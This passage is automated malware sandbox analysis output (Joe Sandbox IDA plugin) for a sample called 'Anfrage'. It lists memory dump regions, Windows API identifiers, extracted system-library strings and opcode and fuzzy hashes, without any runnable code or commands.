                                                                          • Instruction Fuzzy Hash: 2131D035A11B12EFE7458F20CE80A8AFBA9FF44758F109025E94047A50DB70EC30DBD1
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.2511246780.0000000036390000.00000040.00001000.00020000.00000000.sdmp, Offset: 36390000, based on PE: true
                                                                          • Associated: 00000007.00000002.2511246780.00000000364B9000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000007.00000002.2511246780.00000000364BD000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000007.00000002.2511246780.000000003652E000.00000040.00001000.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_36390000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID: DebugPrintTimes
                                                                          • String ID: $$$
                                                                          • API String ID: 3446177414-233714265
                                                                          • Opcode ID: e339b0776deb65a343ee3f21f508fc4c4ed3ffd968d0dc4379b5bc0940487690
                                                                          • Instruction ID: ed87cacc50dae82b9f164b70528c6dadf18b74a173ec0cc4dfac1b318d78b674
                                                                          • Opcode Fuzzy Hash: e339b0776deb65a343ee3f21f508fc4c4ed3ffd968d0dc4379b5bc0940487690
                                                                          • Instruction Fuzzy Hash: 69619A76E44749DFEB21CFA5C9D0BA9BBF2BF44308F10406DD519AB680CB34A945CB92
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.2511246780.0000000036390000.00000040.00001000.00020000.00000000.sdmp, Offset: 36390000, based on PE: true
                                                                          • Associated: 00000007.00000002.2511246780.00000000364B9000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000007.00000002.2511246780.00000000364BD000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000007.00000002.2511246780.000000003652E000.00000040.00001000.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_36390000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit
                                                                          • API String ID: 0-118005554
                                                                          • Opcode ID: 216d98d665a6d418bb71eed0c64e3d51b46752a47188586f237c1e9c2432cba1
                                                                          • Instruction ID: f64bb656dec42e7051024db5eb67823f962f43c98bc8fcd8cf1eab0508bfe251
                                                                          • Opcode Fuzzy Hash: 216d98d665a6d418bb71eed0c64e3d51b46752a47188586f237c1e9c2432cba1
                                                                          • Instruction Fuzzy Hash: 7A31AE76A087419BE312CF25D884B1AB7E4EF85754F06186DF9548B390FB30D905CB93
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.2511246780.0000000036390000.00000040.00001000.00020000.00000000.sdmp, Offset: 36390000, based on PE: true
                                                                          • Associated: 00000007.00000002.2511246780.00000000364B9000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000007.00000002.2511246780.00000000364BD000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000007.00000002.2511246780.000000003652E000.00000040.00001000.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_36390000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: .Local\$@
                                                                          • API String ID: 0-380025441
                                                                          • Opcode ID: c3ecf61c14b77dc4865dd93e8b6f3e78513abbf96b3d96ae833fc07e424bc680
                                                                          • Instruction ID: 3f89013913b590bdbe6f093876016906c5a0484ae18b78e8bcb0720719daeb61
                                                                          • Opcode Fuzzy Hash: c3ecf61c14b77dc4865dd93e8b6f3e78513abbf96b3d96ae833fc07e424bc680
                                                                          • Instruction Fuzzy Hash: 25318FB69593159FF311CF28C880A5BBBE8EF85694F40092EF99487250DA36DD08CBD3
                                                                          Strings
                                                                          • SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx, xrefs: 36432A95
                                                                          • RtlpInitializeAssemblyStorageMap, xrefs: 36432A90
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.2511246780.0000000036390000.00000040.00001000.00020000.00000000.sdmp, Offset: 36390000, based on PE: true
                                                                          • Associated: 00000007.00000002.2511246780.00000000364B9000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000007.00000002.2511246780.00000000364BD000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000007.00000002.2511246780.000000003652E000.00000040.00001000.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_36390000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: RtlpInitializeAssemblyStorageMap$SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx
                                                                          • API String ID: 0-2653619699
                                                                          • Opcode ID: c2997df6dce9304f02986e2a1f1b3c0664c00c028f6fbb0721a6b02b7577cd2d
                                                                          • Instruction ID: ea40113c86d5d3e3db0c246260ac959dc50c00386b5f0c548cdb46bdb1973eb2
                                                                          • Opcode Fuzzy Hash: c2997df6dce9304f02986e2a1f1b3c0664c00c028f6fbb0721a6b02b7577cd2d
                                                                          • Instruction Fuzzy Hash: ED113676F11310ABF7268E59CD81F6B76ADDB84B54F248029B900EF340D676CD00C6E1
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.2511246780.0000000036390000.00000040.00001000.00020000.00000000.sdmp, Offset: 36390000, based on PE: true
                                                                          • Associated: 00000007.00000002.2511246780.00000000364B9000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000007.00000002.2511246780.00000000364BD000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000007.00000002.2511246780.000000003652E000.00000040.00001000.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_36390000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: @[K6@[K6
                                                                          • API String ID: 0-22646139
                                                                          • Opcode ID: 78c9ff470df6420b7a74997d2454918220740dd5b34162e963190ed193d661d8
                                                                          • Instruction ID: 9547738da6cbbb581aaa52e80ab23e68e9e7b6827890fad7c3319c5e768bd9ff
                                                                          • Opcode Fuzzy Hash: 78c9ff470df6420b7a74997d2454918220740dd5b34162e963190ed193d661d8
                                                                          • Instruction Fuzzy Hash: 6B32C2B6E01229DFDF15CF99C990BAEBBB5FF44754F140029E806AB380E7359911CBA1
                                                                          APIs
                                                                          • @_EH4_CallFilterFunc@8.LIBCMT ref: 36493356
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.2511246780.0000000036390000.00000040.00001000.00020000.00000000.sdmp, Offset: 36390000, based on PE: true
                                                                          • Associated: 00000007.00000002.2511246780.00000000364B9000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000007.00000002.2511246780.00000000364BD000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000007.00000002.2511246780.000000003652E000.00000040.00001000.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_36390000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID: CallFilterFunc@8
                                                                          • String ID:
                                                                          • API String ID: 4062629308-0
                                                                          • Opcode ID: d6d925caf8c50df51fa48e09bf07deeb06bfdbe634db4cebcc9f5908cafd0034
                                                                          • Instruction ID: 415d42360f530f56b29c4f44eba481a9ec7fd1b0eeb5fb1c84c39b82f8d83ace
                                                                          • Opcode Fuzzy Hash: d6d925caf8c50df51fa48e09bf07deeb06bfdbe634db4cebcc9f5908cafd0034
                                                                          • Instruction Fuzzy Hash: 11C124B5D417298FDB26CF1AC8846D9BBF1FB89314F5081AEE549A7350E734AA81CF40
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.2511246780.0000000036390000.00000040.00001000.00020000.00000000.sdmp, Offset: 36390000, based on PE: true
                                                                          • Associated: 00000007.00000002.2511246780.00000000364B9000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000007.00000002.2511246780.00000000364BD000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000007.00000002.2511246780.000000003652E000.00000040.00001000.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_36390000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID: DebugPrintTimes
                                                                          • String ID:
                                                                          • API String ID: 3446177414-0
                                                                          • Opcode ID: 9588a98c1a4f3f0bc73fdb97f23ab06753ff6c7ef4e2ff7eb7e944493d588cb5
                                                                          • Instruction ID: 62192dc0b7f60c1145e981a6c007f5f3186235192b405cc438177ca6de7d940b
                                                                          • Opcode Fuzzy Hash: 9588a98c1a4f3f0bc73fdb97f23ab06753ff6c7ef4e2ff7eb7e944493d588cb5
                                                                          • Instruction Fuzzy Hash: 56B102B5A083408FD355CF29C980A5AFBF1BB89304F54496EF899D7352D731E946CB82
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.2511246780.0000000036390000.00000040.00001000.00020000.00000000.sdmp, Offset: 36390000, based on PE: true
                                                                          • Associated: 00000007.00000002.2511246780.00000000364B9000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000007.00000002.2511246780.00000000364BD000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000007.00000002.2511246780.000000003652E000.00000040.00001000.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_36390000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 3ad80ef638dbb0e1db942fca1669a46c3411efc3dadd9c794a56bf99c455f05d
                                                                          • Instruction ID: 5d119e317fce5a483a76983432d73ec90eabf2784eeb6c6df38bbeea27451ac3
                                                                          • Opcode Fuzzy Hash: 3ad80ef638dbb0e1db942fca1669a46c3411efc3dadd9c794a56bf99c455f05d
                                                                          • Instruction Fuzzy Hash: 02A116B5A08741CFE315CF28C484A1ABBF6BF88754F24496EF98597350EB30E945CB92
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.2511246780.0000000036390000.00000040.00001000.00020000.00000000.sdmp, Offset: 36390000, based on PE: true
                                                                          • Associated: 00000007.00000002.2511246780.00000000364B9000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000007.00000002.2511246780.00000000364BD000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000007.00000002.2511246780.000000003652E000.00000040.00001000.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_36390000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 852e4dd00861aac240e21643567632a4b264e20a34ddb7d2821b6469f27a81ac
                                                                          • Instruction ID: 300378ce74cc7c42269db9da50d77dc06055beaec2de7d71df44b4ded83fa93c
                                                                          • Opcode Fuzzy Hash: 852e4dd00861aac240e21643567632a4b264e20a34ddb7d2821b6469f27a81ac
                                                                          • Instruction Fuzzy Hash: 3E612FB5E04606EFEB09CF78C884A9DFBB5BF45244F24816AE919A7300DB30AD55CBD1
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.2511246780.0000000036390000.00000040.00001000.00020000.00000000.sdmp, Offset: 36390000, based on PE: true
                                                                          • Associated: 00000007.00000002.2511246780.00000000364B9000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000007.00000002.2511246780.00000000364BD000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000007.00000002.2511246780.000000003652E000.00000040.00001000.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_36390000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: d65fcca55ae00e1a86cfc37d5b87bdc94516c0f29bdad1c6a064155a2c6cf943
                                                                          • Instruction ID: 1160c6e7c29dfa5ffb3209ce9f9ae413e697790bb0090a35aeddb51a0ed00393
                                                                          • Opcode Fuzzy Hash: d65fcca55ae00e1a86cfc37d5b87bdc94516c0f29bdad1c6a064155a2c6cf943
                                                                          • Instruction Fuzzy Hash: 86415BB5D11288DFDB11CFAAC880AAEFBF4FB49340F50416EE999A7211DB319905CF60
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.2511246780.0000000036390000.00000040.00001000.00020000.00000000.sdmp, Offset: 36390000, based on PE: true
                                                                          • Associated: 00000007.00000002.2511246780.00000000364B9000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000007.00000002.2511246780.00000000364BD000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000007.00000002.2511246780.000000003652E000.00000040.00001000.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_36390000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID: DebugPrintTimes
                                                                          • String ID:
                                                                          • API String ID: 3446177414-0
                                                                          • Opcode ID: 8b456ffcb671d77c54d852a3956d6d35291eb3c892f70d9c3cbdf8a6851bc59d
                                                                          • Instruction ID: 7efb324c71a767f248414f74b9f7e9ee06e03eafeaf898826cb75d8944cf4261
                                                                          • Opcode Fuzzy Hash: 8b456ffcb671d77c54d852a3956d6d35291eb3c892f70d9c3cbdf8a6851bc59d
                                                                          • Instruction Fuzzy Hash: 7A315372A40304AFDB11CF14C880A5677B9FF85364F10426AED468B291CF31ED06CBE6
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.2511246780.0000000036390000.00000040.00001000.00020000.00000000.sdmp, Offset: 36390000, based on PE: true
                                                                          • Associated: 00000007.00000002.2511246780.00000000364B9000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000007.00000002.2511246780.00000000364BD000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000007.00000002.2511246780.000000003652E000.00000040.00001000.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_36390000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID: DebugPrintTimes
                                                                          • String ID:
                                                                          • API String ID: 3446177414-0
                                                                          • Opcode ID: 8fd8a92521ca8b085bc358c846f89879d150c32911073da8ac3f47faf9aee0a1
                                                                          • Instruction ID: aa54524a328427c6c018a7957916b4d87da0eb438ca19b5ef030cbb7f5f2f4cd
                                                                          • Opcode Fuzzy Hash: 8fd8a92521ca8b085bc358c846f89879d150c32911073da8ac3f47faf9aee0a1
                                                                          • Instruction Fuzzy Hash: 1D317E35B25A05BFE7469F24CE80A8ABBA6FF45654F645029E90087B50DB31EC31CBC1
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.2511246780.0000000036390000.00000040.00001000.00020000.00000000.sdmp, Offset: 36390000, based on PE: true
                                                                          • Associated: 00000007.00000002.2511246780.00000000364B9000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000007.00000002.2511246780.00000000364BD000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000007.00000002.2511246780.000000003652E000.00000040.00001000.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_36390000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID: DebugPrintTimes
                                                                          • String ID:
                                                                          • API String ID: 3446177414-0
                                                                          • Opcode ID: 484584f9993634c9fbc9c2fbab0871f34d28b71b70ad4630716f757d4efdec25
                                                                          • Instruction ID: ced05506943045babf2d8bfc85e75134707f580fb25d1d358646423cecc08e04
                                                                          • Opcode Fuzzy Hash: 484584f9993634c9fbc9c2fbab0871f34d28b71b70ad4630716f757d4efdec25
                                                                          • Instruction Fuzzy Hash: 77212376A45B509FFB229F05C9C4B5ABBA5FF81B20F610569F9800B750CA74EC18CB93
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.2511246780.0000000036390000.00000040.00001000.00020000.00000000.sdmp, Offset: 36390000, based on PE: true
                                                                          • Associated: 00000007.00000002.2511246780.00000000364B9000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000007.00000002.2511246780.00000000364BD000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000007.00000002.2511246780.000000003652E000.00000040.00001000.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_36390000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID: DebugPrintTimes
                                                                          • String ID:
                                                                          • API String ID: 3446177414-0
                                                                          • Opcode ID: 7337696047c855d29156ea5b9a831d5e4ee2f378bb573415c2ba6f063687537c
                                                                          • Instruction ID: 1faae1760f7123fe7ddf480e21b461d0c74e8abfcc214cefbe2a904cdd11e08e
                                                                          • Opcode Fuzzy Hash: 7337696047c855d29156ea5b9a831d5e4ee2f378bb573415c2ba6f063687537c
                                                                          • Instruction Fuzzy Hash: 40F0FA32600640ABEB31DF09CC04F8ABBEDEF86B00F180518A54A935D0CAA1E909C660
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.2511246780.0000000036390000.00000040.00001000.00020000.00000000.sdmp, Offset: 36390000, based on PE: true
                                                                          • Associated: 00000007.00000002.2511246780.00000000364B9000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000007.00000002.2511246780.00000000364BD000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000007.00000002.2511246780.000000003652E000.00000040.00001000.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_36390000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: W
                                                                          • API String ID: 0-655174618
                                                                          • Opcode ID: 03bc1be759c902a14ed92fa26cf6a6216c670c66a814c57e4e74282b124e2785
                                                                          • Instruction ID: 33d52daeddd2b4d166c4eb621862a0ed9345093a841a4d05e8f11ba0948f14cb
                                                                          • Opcode Fuzzy Hash: 03bc1be759c902a14ed92fa26cf6a6216c670c66a814c57e4e74282b124e2785
                                                                          • Instruction Fuzzy Hash: 88A132B5E40629CFEB25CF25CD80BD9BBF1AB49305F1041EAD849A7351DB349A85CF90
                                                                          Strings
                                                                          • System Volume Information, xrefs: 3646DEBE
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.2511246780.0000000036390000.00000040.00001000.00020000.00000000.sdmp, Offset: 36390000, based on PE: true
                                                                          • Associated: 00000007.00000002.2511246780.00000000364B9000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000007.00000002.2511246780.00000000364BD000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000007.00000002.2511246780.000000003652E000.00000040.00001000.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_36390000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: System Volume Information
                                                                          • API String ID: 0-764423717
                                                                          • Opcode ID: 858200bb3c8130dcc664ca1be04879ac7833e2de9c1a10e8729e2ebc37bdf946
                                                                          • Instruction ID: c12343361123856ce4c6fb3d70637dfd8613e091e8e827ed8814b9c987407e2b
                                                                          • Opcode Fuzzy Hash: 858200bb3c8130dcc664ca1be04879ac7833e2de9c1a10e8729e2ebc37bdf946
                                                                          • Instruction Fuzzy Hash: A7617A71908325AFD711DF55CC80EABB7E9EF98B94F00092DF981972A0EA74DD44CB92
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.2511246780.0000000036390000.00000040.00001000.00020000.00000000.sdmp, Offset: 36390000, based on PE: true
                                                                          • Associated: 00000007.00000002.2511246780.00000000364B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000007.00000002.2511246780.00000000364BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000007.00000002.2511246780.000000003652E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_36390000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: @
                                                                          • API String ID: 0-2766056989
                                                                          • Opcode ID: 32fdc9af89b0788a3bba97dbd317d7b10cd0208f20562fc1281393ba3f626ce3
                                                                          • Instruction ID: 04d2ef55fac78dbdd3c5318c74555b421fe23e11deefaefed3daa282cb57b2f6
                                                                          • Opcode Fuzzy Hash: 32fdc9af89b0788a3bba97dbd317d7b10cd0208f20562fc1281393ba3f626ce3
                                                                          • Instruction Fuzzy Hash: 4C615C75D00329AFEB11CFA6C840F9EBBB8FF84754F614169E810A7290DB749E04CBA5
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.2511246780.0000000036390000.00000040.00001000.00020000.00000000.sdmp, Offset: 36390000, based on PE: true
                                                                          • Associated: 00000007.00000002.2511246780.00000000364B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000007.00000002.2511246780.00000000364BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000007.00000002.2511246780.000000003652E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_36390000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: @
                                                                          • API String ID: 0-2766056989
                                                                          • Opcode ID: 8281e956446473216ed512d18dfae26456dfb93296f0f4edbd2d8efa18977056
                                                                          • Instruction ID: b304f48386f4e490639a10e9cba5caaa9df9de2fe737feaa26897a63fb050d69
                                                                          • Opcode Fuzzy Hash: 8281e956446473216ed512d18dfae26456dfb93296f0f4edbd2d8efa18977056
                                                                          • Instruction Fuzzy Hash: 6251B8B2914701AFE712AF55CC81F6BB7E8FF84754F400929B9809B290DBB5ED04CB92
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.2511246780.0000000036390000.00000040.00001000.00020000.00000000.sdmp, Offset: 36390000, based on PE: true
                                                                          • Associated: 00000007.00000002.2511246780.00000000364B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000007.00000002.2511246780.00000000364BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000007.00000002.2511246780.000000003652E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_36390000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: @
                                                                          • API String ID: 0-2766056989
                                                                          • Opcode ID: f6d24db04a8b22f10dd332497e656ae38b365cd664294fb4cdc3bf0e0e6027ed
                                                                          • Instruction ID: 69c7ec09f3731a8ec58ece10b19f6ab7af8458502f8f82b95c5b353f4e567a38
                                                                          • Opcode Fuzzy Hash: f6d24db04a8b22f10dd332497e656ae38b365cd664294fb4cdc3bf0e0e6027ed
                                                                          • Instruction Fuzzy Hash: 13518D716057119FD321CF25C840A6BBBF9FF88750F00892EF99587690E7B4D914CBA6
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.2511246780.0000000036390000.00000040.00001000.00020000.00000000.sdmp, Offset: 36390000, based on PE: true
                                                                          • Associated: 00000007.00000002.2511246780.00000000364B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000007.00000002.2511246780.00000000364BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000007.00000002.2511246780.000000003652E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_36390000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: PreferredUILanguages
                                                                          • API String ID: 0-1884656846
                                                                          • Opcode ID: 32a640bcfdec7bd3589806cc0d0d67e3502cadf46e55e866b52d10037c60a435
                                                                          • Instruction ID: 8747f2d5eae58c400a136adf5cbfaa9333fe540a078167727be40ffd74dbc10d
                                                                          • Opcode Fuzzy Hash: 32a640bcfdec7bd3589806cc0d0d67e3502cadf46e55e866b52d10037c60a435
                                                                          • Instruction Fuzzy Hash: DF41C676D00229ABDF12DE95CC80BEEB7B9EF44754F410166E821EBB50D634DE80C7A1
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.2511246780.0000000036390000.00000040.00001000.00020000.00000000.sdmp, Offset: 36390000, based on PE: true
                                                                          • Associated: 00000007.00000002.2511246780.00000000364B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000007.00000002.2511246780.00000000364BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000007.00000002.2511246780.000000003652E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_36390000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: verifier.dll
                                                                          • API String ID: 0-3265496382
                                                                          • Opcode ID: 020b34ed99a94b1ffd94709f2f1dfa31a47df4f53f8773b9969ad56dee2f3e00
                                                                          • Instruction ID: 68f4f310154eb1d5af64b9f3f58c659bdfe64461adc4be3c759f47f06389c6b7
                                                                          • Opcode Fuzzy Hash: 020b34ed99a94b1ffd94709f2f1dfa31a47df4f53f8773b9969ad56dee2f3e00
                                                                          • Instruction Fuzzy Hash: 843193B5E243019FEB1AAE2DD861B66B7E5EB49350F94403AE644DF380E631CC81DB90
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.2511246780.0000000036390000.00000040.00001000.00020000.00000000.sdmp, Offset: 36390000, based on PE: true
                                                                          • Associated: 00000007.00000002.2511246780.00000000364B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000007.00000002.2511246780.00000000364BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000007.00000002.2511246780.000000003652E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_36390000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: #
                                                                          • API String ID: 0-1885708031
                                                                          • Opcode ID: 4bc324cfbfa2083798c26090082f3552f5e90ae9522e24348f396a2005f93b47
                                                                          • Instruction ID: 80a5e6febd5823f17c6f48bcae7cb71944aec2c922612f90fe7f4fab06b3a6dc
                                                                          • Opcode Fuzzy Hash: 4bc324cfbfa2083798c26090082f3552f5e90ae9522e24348f396a2005f93b47
                                                                          • Instruction Fuzzy Hash: 4F41DE79E10226ABEB11CF48D894BBEB3B4EF44745F10406AE849AB300DB35D951CBE1
                                                                          Strings
                                                                          • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 363C0058
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.2511246780.0000000036390000.00000040.00001000.00020000.00000000.sdmp, Offset: 36390000, based on PE: true
                                                                          • Associated: 00000007.00000002.2511246780.00000000364B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000007.00000002.2511246780.00000000364BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000007.00000002.2511246780.000000003652E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_36390000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode
                                                                          • API String ID: 0-996340685
                                                                          • Opcode ID: dfdc04a58d093c43f3c726bb4d0f1fbde4d12035087400e2a6bf033aa8681c10
                                                                          • Instruction ID: 45e645cc69287f0dccea209e3727d392a0f4a0625740c8fae04df2a598ec6665
                                                                          • Opcode Fuzzy Hash: dfdc04a58d093c43f3c726bb4d0f1fbde4d12035087400e2a6bf033aa8681c10
                                                                          • Instruction Fuzzy Hash: C8418379E107969AD724DFB4C4406D7B7F8BF45300F10482EE6AAD3240E735A948CBA2
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.2511246780.0000000036390000.00000040.00001000.00020000.00000000.sdmp, Offset: 36390000, based on PE: true
                                                                          • Associated: 00000007.00000002.2511246780.00000000364B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000007.00000002.2511246780.00000000364BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000007.00000002.2511246780.000000003652E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_36390000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: Flst
                                                                          • API String ID: 0-2374792617
                                                                          • Opcode ID: 9a06515bfd1ca490bb38c52947be2249bdf23f5b2d8607700e6a809b6ac76574
                                                                          • Instruction ID: 74129f9803a9d2897008e6734f297305add0a8cf757bffb5e095b60f87afd57a
                                                                          • Opcode Fuzzy Hash: 9a06515bfd1ca490bb38c52947be2249bdf23f5b2d8607700e6a809b6ac76574
